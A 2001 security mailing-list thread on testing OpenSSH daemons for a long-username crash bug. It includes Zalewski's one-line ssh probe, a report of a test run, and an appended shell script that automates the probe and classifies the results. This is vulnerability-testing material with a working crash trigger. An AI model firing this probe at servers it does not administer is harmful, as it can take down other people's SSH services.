On Tue, 4 Dec 2001 17:16:22 -0500 (EST) Michal Zalewski <lcamtufat_private> wrote:

> On Tue, 4 Dec 2001, Jason Baker wrote:
>
> > I took a quick look around and didn't see the exploit code, is there
> > anyone who can confirm if debian with ssh 1:1.2.3-9.2 is vulnerable?
> > (Or point me at the exploit and I'll test myself)
>
> You can test for the vulnerability in a rather trivial way, as described in
> our original advisory. You need to use an OpenSSH client that does not
> truncate usernames, and then try the following:
>
> ssh -l`perl -e '{print "A"x90000}'` someserver -v
>
> If the connection is dropped with no error message (and the daemon dies
> with signal 11) after establishing a connection and exchanging keys but
> before the password prompt, you are vulnerable. If it gives you a password
> prompt, you are not vulnerable.

Thanks for the handy test! I can confirm that the *updated* debian package
with SSH-1.5-OpenSSH-1.2.3 is not vulnerable:

bluebottle:~ >ssh -l`perl -e '{print "A"x90000}'` 130.216.yyy.xxx
Word too long.
bluebottle:~ >src/scanssh/scanssh 130.216.yyy.xxx
130.216.yyy.xxx SSH-1.5-OpenSSH-1.2.3

Russell Fulton, Computer and Network Security Officer
The University of Auckland, New Zealand

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
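Editor's note: the probe Zalewski describes is easy to get wrong at the shell level. In the transcript above, "Word too long." is the csh/tcsh shell refusing a 90000-character command-line word; the ssh client never ran, so that run says nothing about the server either way. The script below is an added example (not code from Zalewski's advisory or from Fulton's post) that builds the oversized username in a variable from a POSIX shell, runs the client in BatchMode so a live server answers with "Permission denied" instead of blocking at an interactive password prompt, and classifies the captured `ssh -v` transcript. Assumptions, labelled in the comments: the local ssh(1) client does not truncate the `-l` argument (as the advisory requires), and the strings grep'd for ("Received encrypted confirmation" for SSH-1, "NEWKEYS" for SSH-2, "Connection closed"/"Permission denied") match the OpenSSH client in use; the transcripts in the usage note are constructed, not captured.

```shell
#!/bin/sh
# Added example, not from the original thread. Wraps the long-username
# probe described in the advisory so it can be run from a POSIX shell.
#
# Assumptions (not established by the thread):
#   - the local ssh client passes the -l value through untruncated
#   - the debug/error strings grep'd for below are what this client prints

# Emit a username of N 'A's (default 90000). Building it with head/tr and
# storing it in a variable avoids the csh "Word too long." limit hit by a
# 90000-character inline word; a single 90000-byte argv entry is well
# within the Linux per-argument limit.
make_username() {
    n="${1:-90000}"
    head -c "$n" /dev/zero | tr '\0' 'A'
}

# Classify a captured `ssh -v` transcript read from stdin. Prints one word:
#   alive         server got past the username and reached authentication
#   dropped       keys were exchanged, then the link died with no auth step
#   inconclusive  anything else (no key exchange, host unreachable, ...)
# "dropped" matches the advisory's description of a vulnerable daemon; it
# is an indicator, not proof: confirm with the daemon's own logs or a core.
classify_probe() {
    log=$(cat)
    if printf '%s\n' "$log" | grep -q -e 'Permission denied' -e 'password:'; then
        echo alive
    elif printf '%s\n' "$log" \
            | grep -q -e 'Received encrypted confirmation' -e 'NEWKEYS' \
        && printf '%s\n' "$log" \
            | grep -q -e 'Connection closed' -e 'Connection reset' -e 'Disconnecting'; then
        echo dropped
    else
        echo inconclusive
    fi
}

# Run the probe against HOST and print the classification.
# BatchMode=yes makes a server that survives the username fail with
# "Permission denied" rather than waiting at a password prompt, so the
# result can be read from the merged stdout/stderr transcript.
run_probe() {
    host="$1"
    user=$(make_username 90000)
    ssh -v -o BatchMode=yes -l "$user" "$host" true 2>&1 | classify_probe
}

# Usage (not executed here):  run_probe 192.0.2.10
```

Note that `classify_probe` only looks at the client side; if the daemon really dies with signal 11 the conclusive evidence is on the server (a core file or the "exited on signal 11" line in its parent's log). A `dropped` result on a host whose daemon you cannot inspect should be reported as "connection dropped after key exchange", not as a confirmed crash.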
This archive was generated by hypermail 2b30 : Tue Dec 04 2001 - 21:07:40 PST